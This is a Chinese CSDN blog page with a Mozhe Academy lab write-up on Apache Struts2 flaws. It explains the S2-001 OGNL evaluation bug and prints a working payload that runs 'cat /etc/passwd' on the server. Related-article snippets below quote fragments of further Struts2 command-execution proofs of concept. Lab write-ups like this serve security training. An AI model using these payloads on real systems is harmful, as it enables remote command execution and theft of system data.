墨者学院 - Apache Struts2系列

最新推荐文章于 2024-08-06 00:48:45 发布
最新推荐文章于 2024-08-06 00:48:45 发布
阅读量2.5k 收藏 4
点赞数 1
分类专栏: Mozhe 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/86295341
版权
本文详细介绍了Apache Struts2中的多个安全漏洞,包括S2-001、S2-004、S2-007、S2-008和S2-009。内容涵盖了这些漏洞的工作原理、攻击者如何利用它们进行命令执行,以及如何修改POC来触发漏洞。通过实例展示了如何通过OGNL表达式解析用户提交的数据,导致命令执行,并提供了参考链接以了解更多详情。
摘要由CSDN通过智能技术生成

文章目录

struct2-001

因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

在这里插入图片描述
在这里插入图片描述

参考Medicean大佬的注解https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-001
使用与利用
访问 http://你的 IP 地址:端口号/

Exp
命令执行(命令加参数:new java.lang.String[]{“cat”,"/etc/passwd"})

    %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

最低0.47元/天 解锁文章
多崎巡礼
关注
专栏目录
开发知识点-Apache Struts2框架
aming小老弟
03-08 831
【代码】开发知识点-Apache Struts2框架。
Apache Struts2是一个优雅的,可扩展的JAVA EE web框架
12-22
struts2吸收了Struts 1和WebWork两者的优势,因此,是一个非常值得期待的框架。
struts2详解
系统运维
09-06 228
Struts2是在WebWork2基础发展而来的。和struts1一样, Struts2也属于MVC框架。不过有一点大家需要注意的是:尽管Struts2struts1在名字上的差别不是很大,但Struts2struts1在代码编写风格上几乎是不一样的。那么既然有了struts1,为何还要推出struts2。主要是因为struts2有以下优点: 1 > 在软件设计上Struts2没有...
Apache Struts 2:构建现代Java Web应用的强大框架
最新发布
gitblog_00099的博客
08-06 355
Apache Struts 2:构建现代Java Web应用的强大框架 strutsMirror of Apache Struts项目地址:https://gitcode.com/gh_mirrors/struts/struts 项目介绍 Apache Struts 2 是一个开源的Java Web应用框架,旨在帮助开发者创建采用Model-View-Controller(MVC)架构的动态We...
Apache Struts 2入门指南
chszs的专栏
10-03 9700
Apache Struts 2入门指南作者:chszs,版权所有,未经同意,不得转载。博主主页:http://blog.csdn.net/chszs本文使用最新的Struts 2.3.24.1版,演示了怎样用Apache Struts 2构建最基本的Web应用。项目的基本需求:1)Maven 3.3.3 2)Eclipse Mars.1 Release (4.5.1) 3)Struts 2.3.24
Apache Struts2远程代码执行漏洞(S2-008)复现
qq_36933272的博客
09-05 1328
漏洞原理:主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 寻找poc:debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_...
墨者学院-Apache Struts2远程代码执行漏洞(S2-029)复现
JimWu的博客
09-04 1095
Apache Struts2远程代码执行漏洞(S2-029)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理:由于在标记属性中对原始用户输入进行评估时,强制双OGNL评估导致远程代码执行。 1.打开靶场,了解一下S2-029漏洞的原理。 2.构造POC,执行命令ls查看文件。 (#_memberAccess[‘allowPrivateAcces...
墨者学院-Apache Struts2远程代码执行漏洞(S2-016)复现
JimWu的博客
09-04 1793
Apache Struts2远程代码执行漏洞(S2-016)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 1.打开靶场,尝试访问/index.action。 证明存在该页面。 2.测试一下是否存在漏洞输入/index.action?redirect:%...
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2037
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
墨者学院-Apache Struts2远程代码执行漏洞(S2-005)复现
JimWu的博客
09-04 620
Apache Struts2远程代码执行漏洞(S2-005)复现 难易程度:★★ 题目类型:命令执行 使用工具:k8 漏洞原理:OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码或8进制即绕过了安全限制。 1.打开靶场,了解s2-005漏洞原理 2.构造poc ?(‘u0023context[‘xwork.MethodAccesso...
什么是struts2
partingwind的博客
06-27 564
一、struts2框架 1.struts2框架的定义 Struts是最早的Java开源框架之一,它是MVC设计模式的一个优秀实现。 Struts定义了通用的Controller(控制器),通过配置文件(通常是 Struts -config.xml) Struts是最早的java开源框架之一,它是MVC设计模式的一个优秀实现。 Struts定义了通用的Controller(控制器)...
0x24.Apache Struts2远程代码执行漏洞(S2-008)复现
qq_31679787的博客
10-17 772
s2-008:1.Cookie 拦截器错误配置可造成 OGNL 表达式执行;2.开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令; 构造poc验证漏洞; poc: ?debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfal...
apachestruts1,struts2的历史
fjgdfgjj的个人博客
07-23 1161
Apache 是如何运作的? https://www.jianshu.com/p/aaa431b5b009 apache jakarta官网 http://jakarta.apache.org/ 维基百科jakarta介绍 https://zh.wikipedia.org/wiki/Jakarta项目 维基百科struts介绍 https://zh.wikipedia.org/wiki/Strut...
struct2与MVC及环境搭建
下辈子注定还当程序猿
03-10 995
1.strutsapache基金会的发布的一个开源软件框架,我们进入apache的官网可以看到。 struts2 是基于WebWork而改进的一个框架,其跟struts1没有较大的关系 2.struts 2 介绍      而在现实的开发中,我们更应对struts 2 有以下一些认识(前端到后端的处理过程)      struts有以下的优势:
SSH搭建之整合struct2
小王同学
07-08 276
参考:https://blog.csdn.net/snowwitch/article/details/509545231.首先配置Tomcat,我这里用的是eclipse,Windows->Preferences->Server->Runtime Environment2.点击add,然后打开Apache,这里我选的是Apache Tomcatv8.0,next3.你们根据自己的...
struct2(S2)漏洞poc合集以及对应版本
weixin_46626737的博客
08-11 765
{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}(后有一个换行符)在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。
Struts2 S2-048远程代码执行漏洞复现
春日野穹
10-23 2747
一、漏洞介绍 1.1 漏洞背景 2017年7月7日,ApacheStruts 发布最新的安全公告,Apache Struts2的strus1插件存在远程代码执行的高危漏洞,漏洞编号为 CVE-2017-9791(S2-048)。攻击者可以构造恶意的字段值通过Struts2struts2-struts1-plugin插件,远程执行代码。 1.2 漏洞影响 Apache Struts 2.3.x系...
vSphere 性能优化方法 & 故障排错方法及工具总结(一)
weixin_54750412的博客
02-04 2637
转自@twt社区 本资料主要包括:性能优化方法:vSphere 性能优化逻辑、针对 VM 的性能优化、针对 CPU 的性能优化、针对 RAM 的性能优化、针对 DISK 的性能优化、针对 Networking 的性能优化。故障排查方法、工具:vSphere 故障排查思想、针对 Virtual Machine 的故障排查、针对 Storage 的故障排查、针对 vCenter 和 ESXi 的故障排查、常用的故障排查工具箱。 性能优化方法 一、vSphere 性能优化逻辑 1 、虚拟化逻辑分层示意图 2 .
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值